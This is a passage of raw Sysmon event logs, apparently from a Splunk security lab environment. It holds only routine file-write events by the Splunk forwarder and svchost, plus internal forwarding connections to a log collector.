Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAC57B8527DB44FC02577922911AF8B,SHA256=A1438BB7E83A093FC2F037F2CFB09AAE12BA24AEA3E36C44AB669989C7C4E833,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298705Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:24.456{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64FEB2B0297CD1CC6CCCA4A7E27CF0F8,SHA256=0F2CF21AEAAB0CF4A06EB690040CF3942D27CC1059AE0F52EBEFD455249228D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:25.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14E43651CDA4B6BEC57541FE6ABDE2E1,SHA256=21ACFA53E46DF4ADD108C77B4A8EBF2398949C02C3532659339E988303730F80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298706Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:25.471{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56D58BF3D34D294B29A74110BF75BE99,SHA256=748D02889B84622500A8CAC8D51DD4D3A45AA34AFEFF833310A091E951B3B116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:26.524{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F1AE5DBD81CB6AC9EC9619CD1718560,SHA256=6B7CEDD5D7BE32F04EAD38E528562CFBF84BF2ED3CF96C78C5D23AFB22454FAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298707Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:26.485{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B019847ACEC7387BD5043EF71DEA025,SHA256=0F47FB62B2A6D127DBAA68392394E5EA49FD1B2381475329506ABAEB5DAD7CAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:27.758{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F632B12C2C67156C04766A4188E89895,SHA256=12D53CD4B9E078AFBFB351E6D0EB419F9560725333A10224233E5986A8B18D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:25.521{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49553-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298708Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:27.505{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DB1BAD5A53062EA78995CBC54947EF3,SHA256=C5FD7E7530FDC98C40257F12216BBB2DDAEA9E5781545C72D2CC839CAD5D5922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222520Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:28.790{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A218C6CBC7F4DD26B54D46C1C06DBBD0,SHA256=FC4E194EB60864B36C5FB4EE565AA328581B69683553A3D83D8F67530FCE4C52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:28.522{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70C104CD3006425C3F33C5498480A0E5,SHA256=DF1DC3CC12EF1FB343BC01FA38EA10A09744129405605870E58F8D0D849EAD26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222521Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:29.837{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC1B6ABCDA0A1BFDCC98774AE6356C5A,SHA256=3AC2B862506284957631852319E959D014E01E7C44ACE34D6154F1233B1F33F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:29.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A0698B2905CD1DE6158348E82E65BE,SHA256=2130B23159B1611E50CFADF12956C134D0AA86AB615475267024CBB06C8D0174,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222524Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:30.852{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7792A909B6C6B238D68EA7F19F7A40B,SHA256=DCC68724865453AA19E8BE1340EDC738B640CAB5F9A6BD455C7EAE979847FF76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:30.553{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD7B046FE1AD225CC22E4F5728E7E7F1,SHA256=81682F9BBCD590546E25E1A4B875381F12B18A37D7417AA4E3ECB7C970B09022,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222523Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:30.493{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D9D6EBE0D16143FE3EA1E9F03EAF5BC4,SHA256=983596C083098CCF25CBF830CE2C06DEA82D01464DB78DB42A246267D3ABF39B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222522Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:27.698{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51724-false10.0.1.12-8000- 23542300x8000000000000000222525Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:31.883{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B82704F92AF9AC935CEDDEC16A72C25F,SHA256=2B20C26E101D4E41AB7763D6BDE25672573A7B7A6C70EC834C22BE5F7EEF096D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:31.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76E9A54398B6CBB7BDAE60D2C476AF1E,SHA256=5E3D606FEFED7C86D0816A11FD09B718FF8A34E1372B0AE5F360CE063530EAD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222526Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:32.961{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE6FE404305DB85726A3BDEC3BD48EFF,SHA256=EDEB30CFBD8E97832CAB1806E918581A0EEB8EBB9B8B0559F7E18DAA6E4E8A3F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:30.663{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49554-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:32.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFEE83EC958BEDFF94F09CE26CB73DAD,SHA256=BE40BE16F6A51436EC654C8AB323C04A6C6172F9DB8AAB62923D7595D0CD8795,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:33.653{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=F865FE4DB33749ABD3A558C27841ED01,SHA256=6BEC5A9EE631A0C94B34945234362C0CDCCAADBDF8B7386CA03DEBF9733159CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:33.604{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46D0019EEAF7AFF356E3BAEFC9073CA5,SHA256=CF25E3DD1B9010F4AA3E5FB2B50F6D0FC34C8E30EB92773615B9A3CC704D31F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:34.639{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29A00D53C42EA5198976EB1D3EE0576C,SHA256=3B9CF97D957E4037851C112075357B3E46F88D2284276AE76BF0447EF79858C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222527Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:34.180{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1129A9BF2D77C823F39A2113C637C86,SHA256=D053ABEEFF040C64F266EBA4B6CEC751ED3B46320A9A3C40770AF974BED3ADE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:35.686{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=092E1E41526F0F8FAF860BDC660908C9,SHA256=9346BC80BCC0C13FDCC2BA6CD83D6223E8EB72F9B5ABEE02A321F9808B523397,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222529Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:33.511{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51725-false10.0.1.12-8000- 23542300x8000000000000000222528Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:35.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00BE90E8AD3E12EF9CDF5BF2A1020F7D,SHA256=F50C213F284B4299C62AC2A4991FF04546D27F29ED79A111B4440690D7AA9404,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:36.708{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0628E59E00EEF3BA09306E43610D268D,SHA256=4381C98A8F52DD2B790C596860E1BE4B7E543C86AFFC32416F2B54B4493520B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222530Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:36.258{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C97A4AB24AC311E4F404AD35DD15557,SHA256=6E18012FE19A8B19A4917D133C651C0873563623A95C7F1A1A9688D3ECAB5C0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:37.739{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDF88F5A4C52E597E0ACAED3BCD5AA76,SHA256=BE3EFAE38995EEAAB18BDC9D6369F5107024D7068A95F72F6474F47D68E38823,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222531Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:37.305{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76FF9D799FA62A04CB71BC82657C7EB0,SHA256=B8FCB4704EEA8563749CDF3F8533773E2F64CECCFE3E631E7862D9E0B9F71BF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:36.650{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49555-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:38.754{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90685CE4E9B24F9BE599C858E6C8C9AE,SHA256=E1E9CB8129967DA302ABD09E4838A4DDFE789386417FC06FD703D0E32AF17249,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222532Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:38.415{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=170DFF2FED60974D0731E391AB68167A,SHA256=AE6F56F357B32DF9420FD800794CF732E808AE3069169DD5C7AB990435C0CB4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:39.769{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8FC61D4AA5FEDAE9991241B79E548D1,SHA256=EDD21BDBF2416D2C3FC3EFB1A24AA1BD874D9C9137A9C6E5F52866879D65A7C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222533Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:39.524{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56CD3923D1D8E377C94BD0DB8190A694,SHA256=D5742D5DD22DAE72491955A81692B21306860DB490C65914A1ED7E6B208C5CBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:40.804{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=380B324A84F2C608417AE6F0BA12F76F,SHA256=FBE553C4E86E3CF64C763AAAEF6627627B179FE831B83817C9553FD35DA399C5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222535Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:38.651{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51726-false10.0.1.12-8000- 23542300x8000000000000000222534Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:40.555{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=511D6B572F31A644778203771CF1C405,SHA256=61E5C16165AA2D9DD48B9565D9300C030335A6786DF8C6C474D1A4AFC344BAF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:40.637{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:41.837{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AD92694B058FE98922CD7AE558EF071,SHA256=A58384747E00329D1DC205EFE843F9EC831394D80C8FF63A9E62E435C81F328C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222536Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:41.743{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBA8FDEF165944B6F4BA0820723079FA,SHA256=81A4AEBD63ACCF259BEE109F72A5487F8FDCAAE013E147FE1E1BCCAEBA5ECE0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:42.852{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=516739E16F73C731EFDEB67C3D916C16,SHA256=FC39BA6DFB6B959D1FF8A98FC2F240A9406D12A9ECAD6F99AA99F7ED03894C37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222537Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:42.758{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45A9D1071C4E131E1B27A66BCA9623D9,SHA256=E9B1046289A45E0D28627B30569AFAD03140EC9DD04B9B120011720915FF8865,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:40.085{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49556-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000298730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:43.903{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1626A23AD08DE0C8A018BFEA0B73314,SHA256=CA01E50ACCD408F1BA284FAE49F7A730AED14394C9A583F4B77AFBFC0D60B59B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:43.774{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31733EEE73400EC598A63F45A91C0D07,SHA256=61DB685329B5000BB836E6E2DC79865A5005D19698A1B6A01AE8469701193365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.805{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FD5640F12FDA0631592176ED4783C2,SHA256=28D4B5CA2B065D1991A98DD8D57A63D9D4D8BA6485427889D87D4DD3DC0FD53B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:44.922{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 